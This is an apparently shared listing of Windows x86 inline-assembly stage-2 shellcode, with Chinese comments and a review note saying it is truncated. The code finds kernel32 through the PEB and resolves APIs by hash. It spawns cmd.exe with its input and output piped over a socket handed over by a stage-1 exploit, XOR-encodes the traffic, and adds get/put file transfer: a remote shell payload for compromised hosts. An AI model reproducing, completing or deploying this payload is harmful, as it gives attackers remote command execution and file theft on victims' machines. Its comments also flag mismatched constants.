
2012-06-26 13:19:21



  1. // Stage-2 shellcode (Windows x86, MSVC inline __asm, MASM syntax).
// Entry contract: eax = socket handle handed over by stage 1 (stored in _hsck);
// the code leaves with `add esp, 8` / `retn` straight back into stage 1, so the
// stage-1 stack layout is a hard dependency. What the visible body does: locates
// kernel32 through fs:[30h] (PEB -> Ldr -> module list), resolves imports by hash
// from kernel32 and then ws2_32, creates an anonymous pipe and a named pipe
// "\\.\pipe", spawns "cmd" with stdin/stdout/stderr redirected to them, and relays
// data between the socket and the child, passing every buffer through xor_data;
// "get"/"put" command prefixes branch to file transfer.
// NOTE(review): the listing is truncated. locate_addr, find_hashfunc_addr,
// xor_data, get_file, put_file, the data area (_hsck, _sbuf, _pbuf, _lap, ...)
// and the closing PROC_END/braces are referenced but not shown, so this is not
// buildable as-is. The "get " / "put " comments do not match their constants
// (0xFF746567 / 0xFF747570 end in 0xFF, not 0x20 — presumably intentional, check
// against xor_data); the third compare's string was censored by the blog
// ("*** " — 0x20786573 decodes to "sex ").
  2. void ShellCode()
  3. {
  4. __asm{
  5. PROC_BEGIN //C macro to begin proc
  6. jmp locate_addr
  7. func_start:
  8. pop edi ; get eip
  9. mov dword ptr [edi+_hsck], eax //保存stage1传来的socket handle
  10. mov eax, fs:30h
  11. mov eax, [eax+0Ch]
  12. mov esi, [eax+1Ch]
  13. lodsd
  14. mov ebp, [eax+8] ; base address of kernel32.dll
  15. mov esi, edi
  16. push _Knums
  17. pop ecx
  18. GetKFuncAddr: ; find functions from kernel32.dll
  19. call find_hashfunc_addr
  20. loop GetKFuncAddr
  21. push 3233h
  22. push 5F327377h ; ws2_32
  23. push esp
  24. call dword ptr [esi+_LoadLibraryA]
  25. mov ebp, eax ; base address of ws2_32.dll
  26. push _Wnums
  27. pop ecx
  28. GetWFuncAddr: ; find functions from ws2_32.dll
  29. call find_hashfunc_addr
  30. loop GetWFuncAddr
  31. push 1 ; sa.inherit=true
  32. push 0 ; sa.descriptor=NULL
  33. push 0x0C ; sa.sizeof(sa)=0x0c
  34. mov ebx, esp
  35. push 0xff
  36. push ebx
  37. lea edx, [esi+_hin0]
  38. push edx
  39. add edx, 4
  40. push edx
  41. call dword ptr [esi+_CreatePipe]
  42. push 0x305C
  43. push 0x65706970
  44. push 0x5C2E5C5C ; "\\.\pipe\0"
  45. mov edi, esp
  46. xor eax, eax
  47. push eax
  48. push eax
  49. push eax
  50. push eax
  51. push 0xff ; UNLIMITED_INSTANCES
  52. push eax ; TYPE_BYTE|READMODE_BYTE|WAIT
  53. push 0x40000003 ; ACCES_DUPLEX|FLAG_OVERLAPPED
  54. push edi ; pip="\\.\pipe\0"
  55. call dword ptr [esi+_CreateNamedPipeA]
  56. mov [esi+_hout1], eax
  57. xor eax, eax
  58. push eax
  59. push eax
  60. push 3 ; OPEN_EXISTING
  61. push ebx ; lap
  62. push eax
  63. push 0x02000000 ; MAXIMUM_ALLOWED
  64. push edi ; pip="\\.\pipe\0"
  65. call dword ptr [esi+_CreateFileA]
  66. mov [esi+_hout0], eax
  67. push 646D63h ; "cmd"
  68. lea edx, [esp]
  69. sub esp, 54h
  70. mov edi, esp
  71. push 14h
  72. pop ecx
  73. xor eax, eax
  74. stack_zero:
  75. mov [edi+ecx*4], eax
  76. loop stack_zero
  77. mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si)
  78. inc byte ptr [edi+3Ch]
  79. inc byte ptr [edi+3Dh] ; si.flg=USESHOWWINDOW|USESTDHANDLES
  80. push [esi+_hin1]
  81. pop ebx
  82. mov [edi+48h], ebx ; si.stdinput
  83. push [esi+_hout0]
  84. pop ebx
  85. mov [edi+4Ch], ebx ; si.stdoutput
  86. mov [edi+50h], ebx ; si.stderror
  87. lea eax, [edi+10h]
  88. push edi
  89. push eax
  90. push ecx
  91. push ecx
  92. push ecx
  93. push 1 ; inherit=TRUE
  94. push ecx
  95. push ecx
  96. push edx ; "cmd"
  97. push ecx
  98. call dword ptr [esi+_CreateProcessA]
  99. push [edi]
  100. pop dword ptr [esi+_pi0]
  101. push [edi+4]
  102. pop dword ptr [esi+_pi1]
  103. push [esi+_hin1]
  104. call dword ptr [esi+_CloseHandle]
  105. push [esi+_hout0]
  106. call dword ptr [esi+_CloseHandle]
  107. add esp, 0x6C ; free sa struct and "\\.\pipe\0" string and si struct
  108. xor eax, eax
  109. push eax
  110. push 1
  111. push 1
  112. push eax
  113. call dword ptr [esi+_CreateEventA]
  114. mov [esi+_epip], eax
  115. xor ebx, ebx
  116. mov [esi+_lap+0x0C], ebx
  117. mov [esi+_lap+0x10], eax
  118. call dword ptr [esi+_WSACreateEvent] // WSACreateEvent();
  119. mov [esi+_esck], eax
  120. mov dword ptr [esi+_flg], 0
  121. k1:
  122. push 0x21 ; FD_READ|FD_CLOSE
  123. push [esi+_esck]
  124. push [esi+_hsck]
  125. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);
  126. xor eax, eax
  127. dec eax
  128. push eax
  129. inc eax
  130. push eax
  131. lea ebx, [esi+_epip]
  132. push ebx
  133. push 2
  134. call dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
  135. push eax
  136. lea ebx, [esi+_sbuf]
  137. push ebx
  138. push [esi+_esck]
  139. push [esi+_hsck]
  140. call dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);
  141. push 0
  142. push dword ptr [esi+_esck]
  143. push dword ptr [esi+_hsck]
  144. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);
  145. push 0
  146. push esp
  147. push 0x8004667e
  148. push [esi+_hsck]
  149. call dword ptr [esi+_ioctlsocket]
  150. pop eax
  151. pop ecx ;
  152. jecxz k2
  153. dec ecx
  154. jnz k5
  155. push 0
  156. push 0x40
  157. lea edx, [esi+_sbuf]
  158. push edx
  159. push [esi+_hsck]
  160. call dword ptr [esi+_recv]
  161. lea edx, [esi+_sbuf]
  162. push eax
  163. pop ecx ;ecx字节数
  164. call xor_data
  165. //+-------------------------------------------
  166. // Add file download and upload function
  167. // 2004-06-09
  168. //
  169. // san
  170. //+-------------------------------------------
  171. cmp dword ptr [esi+_sbuf], 0xFF746567 ; "get "
  172. jz get_file
  173. cmp dword ptr [esi+_sbuf], 0xFF747570 ; "put "
  174. jz put_file
  175. cmp DWORD ptr [esi+_sbuf], 0x20786573 ; "*** " ***加空格, 安全退出
  176. jz k5
  177. restore:
  178. push 0
  179. lea ebx, [esi+_cnt]
  180. push ebx
  181. push eax ; size
  182. lea ebx, [esi+_sbuf]
  183. push ebx
  184. push [esi+_hin0]
  185. call [esi+_WriteFile] // WriteFile(_hin0, _sbuf, len, _cnt);
  186. k2:
  187. mov ecx, [esi+_flg]
  188. jecxz k3
  189. push eax
  190. lea ebx, [esi+_cnt]
  191. push ebx
  192. lea ebx, [esi+_lap]
  193. push ebx
  194. push [esi+_hout1]
  195. call dword ptr [esi+_GetOverlappedResult]
  196. xchg eax, ecx
  197. jecxz k5
  198. jmp k4
  199. k3:
  200. lea ebx, [esi+_lap]
  201. push ebx
  202. lea ebx, [esi+_cnt]
  203. push ebx
  204. push 0x40
  205. lea ebx, [esi+_pbuf]
  206. push ebx
  207. push [esi+_hout1]
  208. call dword ptr [esi+_ReadFile]
  209. inc dword ptr [esi+_flg]
  210. test eax, eax
  211. jz k1
  212. k4:
  213. lea edx, [esi+_pbuf]
  214. push [esi+_cnt]
  215. pop ecx
  216. call xor_data
  217. dec dword ptr [esi+_flg]
  218. push 0
  219. mov ebx, [esi+_cnt]
  220. push ebx
  221. lea ebx, [esi+_pbuf]
  222. push ebx
  223. push [esi+_hsck]
  224. call dword ptr [esi+_send]
  225. jmp k1
  226. k5:
  227. //int 3
  228. //push 0 //应该可以没有
  229. push [esi+_pi0] // 进程 handler
  230. call dword ptr [esi+_TerminateProcess] //结束掉cmd
  231. // call dword ptr [esi+_ExitThread]
  232. // call DWORD ptr [esi+_ExitProcess]
  233. push [esi+_pi0]
  234. push [esi+_pi1]
  235. push [esi+_hout1]
  236. push [esi+_hin0]
  237. call dword ptr [esi+_CloseHandle]
  238. call dword ptr [esi+_CloseHandle]
  239. call dword ptr [esi+_CloseHandle]
  240. call dword ptr [esi+_CloseHandle]
  241. push [esi+_hsck]
  242. call dword ptr [esi+_closesocket]
  243. // xor eax, eax
  244. // dec eax
  245. // push eax
  246. // call dword ptr [esi+_TerminateProcess] 结束当前进程
  247. // call dword ptr [esi+_ExitThread]
  248. // 返回stage1 恢复栈平衡
  249. //int 3
  250. add esp, 8h
  251. retn
